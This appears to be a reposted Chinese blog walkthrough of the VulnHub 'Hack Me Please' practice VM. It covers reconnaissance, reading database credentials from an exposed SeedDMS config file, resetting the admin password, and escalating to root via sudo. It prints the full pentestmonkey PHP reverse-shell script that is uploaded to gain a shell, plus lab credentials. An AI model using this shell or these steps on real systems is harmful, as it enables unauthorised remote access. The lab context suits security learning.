vulnhub靶场之HACK ME PLEASE

2023年10月13日下午2:36 • Python • 阅读 49

准备：

攻击机：虚拟机kali、本机win10。

靶机：HACK ME PLEASE，下载地址：https://download.vulnhub.com/hackmeplease/Hack_Me_Please.rar，下载后直接vbox打开即可。

知识点：seeddms框架、敏感信息泄露、shell上传、目录扫描（较多）。

信息收集：

通过nmap扫描下网段内的存活主机地址，确定下靶机的地址：nmap -sn 192.168.110.0/24，获得靶机地址：192.168.110.4。

扫描下端口对应的服务：nmap -T4 -sV -p- -A 192.168.110.4，显示开放了80、3306、33060端口，开启了apache、mysql服务。

目录扫描：

使用dirmap进行目录扫描，发现了一些图片文件和js文件，在http://192.168.110.4/js/main.js文件中发现了一个目录信息：/seeddms51x/seeddms-5.1.22/。

对新发现的两个目录进行扫描，发现了/conf、/data、/doc、/inc等目录和文件，登录界面：http://192.168.110.4//seeddms51x/seeddms-5.1.22/out/out.ViewFolder.php，但是缺少账号和密码，也简单测试了下注入未成功。

对conf目录进行扫描，发现了/seeddms51x/conf/settings.xml，访问该文件查看是否隐藏有账户信息，意外发现了数据库的账号和密码信息：seeddms/seeddms。

数据库连接和web登录：

使用账户信息：seeddms/seeddms在navicat客户端进行连接，查看下数据库内的信息，在tblUsers中发现账户admin和其密码信息：admin

/f9ef2c539bad8a6d2f3432b6d49ab51a、以及：saket/Saket@#$1337。

修改数据库中admin账户的密码信息，在加密网站随便加密一串字符串，这里用的是upfine，将加密的字符串替换掉原来的加密字符串。

使用已知的账户名：admin和修改的密码：upfine，在http://192.168.110.4/seeddms51x/seeddms-5.1.22/out/out.ViewFolder.php界面进行登录。

获取shell：

在登录的web中发现了一处上传功能，上传shell反弹脚本，脚本内容可在：https://www.revshells.com/网站中获取，选取PHP PentestMonkey模块即可，或复制下面代码。

shell反弹脚本


<?php
// php-reverse-shell - A Reverse Shell implementation in PHP. Comments stripped to slim it down. RE: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net

set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.110.4';
$port = 6688;
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; sh -i';
$daemon = 0;
$debug = 0;

if (function_exists('pcntl_fork')) {
    $pid = pcntl_fork();

    if ($pid == -1) {
        printit("ERROR: Can't fork");
        exit(1);
    }

    if ($pid) {
        exit(0);  // Parent exits
    }
    if (posix_setsid() == -1) {
        printit("Error: Can't setsid()");
        exit(1);
    }

    $daemon = 1;
} else {
    printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}

chdir("/");

umask(0);

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
    printit("$errstr ($errno)");
    exit(1);
}

$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
    printit("ERROR: Can't spawn shell");
    exit(1);
}

stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
    if (feof($sock)) {
        printit("ERROR: Shell connection terminated");
        break;
    }

    if (feof($pipes[1])) {
        printit("ERROR: Shell process terminated");
        break;
    }

    $read_a = array($sock, $pipes[1], $pipes[2]);
    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

    if (in_array($sock, $read_a)) {
        if ($debug) printit("SOCK READ");
        $input = fread($sock, $chunk_size);
        if ($debug) printit("SOCK: $input");
        fwrite($pipes[0], $input);
    }

    if (in_array($pipes[1], $read_a)) {
        if ($debug) printit("STDOUT READ");
        $input = fread($pipes[1], $chunk_size);
        if ($debug) printit("STDOUT: $input");
        fwrite($sock, $input);
    }

    if (in_array($pipes[2], $read_a)) {
        if ($debug) printit("STDERR READ");
        $input = fread($pipes[2], $chunk_size);
        if ($debug) printit("STDERR: $input");
        fwrite($sock, $input);
    }
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

function printit ($string) {
    if (!$daemon) {
        print "$string\n";
    }
}

?>

使用上传功能上传shell.php脚本信息，上传之后会显示错误信息，但是在主目录下是可以正常看到上传的shell文件的。

然后需要查找下上传文件的目录信息，在下载的seeddms框架中找到了其数据存放的目录为1048576，因此对靶机该目录进行扫描，命令：dirsearch -u http://192.168.110.4/seeddms51x/data/1048576 -e *，发现了/1048576/6目录，继续对此目录进行扫描，发现了1.php文件。

kali端开启对6688端口的监听，然后访问该php文件，成功获得shell权限。

提权：

前往/home目录下简单的查看下都有哪些账户，发现了账户saket，前面在数据库中获得了这个账户的密码：Saket@#$1337，因此我们可以直接切换到saket账户。

查看下当前账户是否存在可以使用的特权命令，sudo -l，显示是all，那就直接sudo su提权到root就好了。

Original: https://www.cnblogs.com/upfine/p/16938614.html
Author: upfine
Title: vulnhub靶场之HACK ME PLEASE

原创文章受到原创版权保护。转载请注明出处：https://www.johngo689.com/797325/

转载文章受原作者版权保护。转载请注明原作者出处！

python

【自取】最近整理的，有需要可以领取学习：

Linux核心资料大放送~

全栈面试题汇总（持续更新&可下载）

一个提高学习100%效率的工具！

【超详细】深度学习面试题目！

LeetCode Python刷题答案下载！

LeetCode Java版刷题答案下载！

LeetCode C++ 版本，抓紧保存！

LeetCode GO语言刷题答案下载！

python网络爬虫（第十章：初识爬虫框架Scrapy）

1.什么是框架一个集成了很多功能且具有很强通用性的一个项目模拟。 2.如何学习框架专门学习框架封装的各种功能的详细用法。 3.什么是Scrapy 爬虫中封装好的一个明星框架。功…

Python 2023年10月3日
0055
【数学建模学习笔记【集训十天】之第六天】

数模学习目录 Matplotlib 学习 * Matplotlib简介 Matplotlib 散点图 – 运行效果如下： Matplotlib Pyplot + 运行效…

Python 2023年8月30日
0048
Scrapy案例（一）

1. 创建项⽬ 2. 创建Spider 3. 创建Item 4. Spider 5.保存数据 1. 命令保存（⽂件：csv ，json …） 2.管道保存完整代码目…

Python 2023年10月2日
0060
入行数据分析要知道数据挖掘到底是做什么的

大家好，我是Mr数据杨，数据挖掘，就像诸葛亮、周瑜、郭嘉等谋士们在军师帐下研究敌军的情报，深入研究每一个信息的细节，预测未来的战局，寻找最佳的战术策略。数据挖掘有两种方式，类似于冷…

Python 2023年8月7日
0052
python Merge

/merage# pandas提供了一个类似于关系数据库的连接(join)操作的方法 merage,可以根据一个或多个键将不同DataFrame中的行连接起来，语法如下： merg…

Python 2023年8月17日
0038
图解来啦！机器学习工业部署最佳实践！10分钟上手机器学习部署与大规模扩展 ⛵

💡 作者：韩信子@ShowMeAI📘 机器学习实战系列：https://www.showmeai.tech/tutorials/41📘 深度学习实战系列：https://www.s…

Python 2023年10月24日
0065
想成为一名黑客怎么办？

想要成为一名黑客，首先第一点就是要坚持。怀抱着黑客英雄主义情怀，只要沿着网络安全这条河堤走，保证自己不分心，三年如一日像《一拳超人》光头侠一样坚持做黑客，你必然能成为安全攻防某个领…

Python 2023年10月11日
0074
(七)C++中实现argmin与argmax

欢迎访问个人网络日志🌹🌹知行空间🌹🌹 python 中寻找一个数组中最大最小元素的下标注，可以使用 numpy中的 argmin和 argmax函数： a = np.array([…

Python 2023年8月26日
0075
Java — 接口

基础语法接口属于引用数据类型，编译之后也是字节码文件接口完全抽象（抽象类是半抽象），可以理解接口是特殊的抽象类接口的定义方法 [修饰符列表] interface 接口名{} …

Python 2023年6月3日
0061
pandas进阶–pivot方法重塑Dataframe

文章目录欢迎关注公众号【Python开发实战】，免费领取Python学习电子书！ pivot方法 * pivot方法介绍用例1 用例2 用例3 欢迎关注公众号【Python开发…

Python 2023年8月7日
0048
什么是机器学习特征工程？【数据集特征抽取（字典，文本TF-Idf）、特征预处理（标准化，归一化）、特征降维（低方差，相关系数，PCA）】

2.特征工程 2.1 数据集 2.1.1 可用数据集 Kaggle网址：https://www.kaggle.com/datasets UCI数据集网址： http://archi…

Python 2023年10月26日
0053
Java Swing 制作一个Pong小游戏

之前呢我们用Python的Pygame做过这个Pong游戏 Python 项目实战教你用Pygame写一个Pong游戏_Leleprogrammer的博客-CSDN博客_pong…

Python 2023年9月19日
0047
圣诞节快到了，教大家用Python画一个简单的圣诞树和烟花，送给那个她

WIDTH = 0 HEIGHT = 0 ORI = (0, 0) COLOR = {'0': '#070920', 'navyb…

Python 2023年10月30日
0047
Pytest常用参数剖析 | 案例演示

上一期基于环境的配置做了简单的介绍，针对Pytest灵活的单元测试框架，它的优点就在于内置方法巧妙之处一、上期重点回顾 ** 运行之前需要给大家介绍下pytest框架文件的设计规…

Python 2023年9月10日
0030
Swin Transformer详解

目录 * – 1. Swin Transformer整体架构 – + (a) Architecture + (b) Two Successive Swin …

Python 2023年9月27日
0046
argparse.ArgumentParser() 用法解析

声明本文借阅了各网站大佬的经验，已将原文附 Reference 部分，再此表达最诚挚的谢意，如有侵权，本人立即删除！ *argparse 模块 argparse 是一个 Pyth…

Python 2023年10月9日
0078

2024 年 5 月
一	二	三	四	五	六	日
		1	2	3	4	5
6	7	8	9	10	11	12
13	14	15	16	17	18	19
20	21	22	23	24	25	26
27	28	29	30	31

vulnhub靶场之HACK ME PLEASE

大家都在看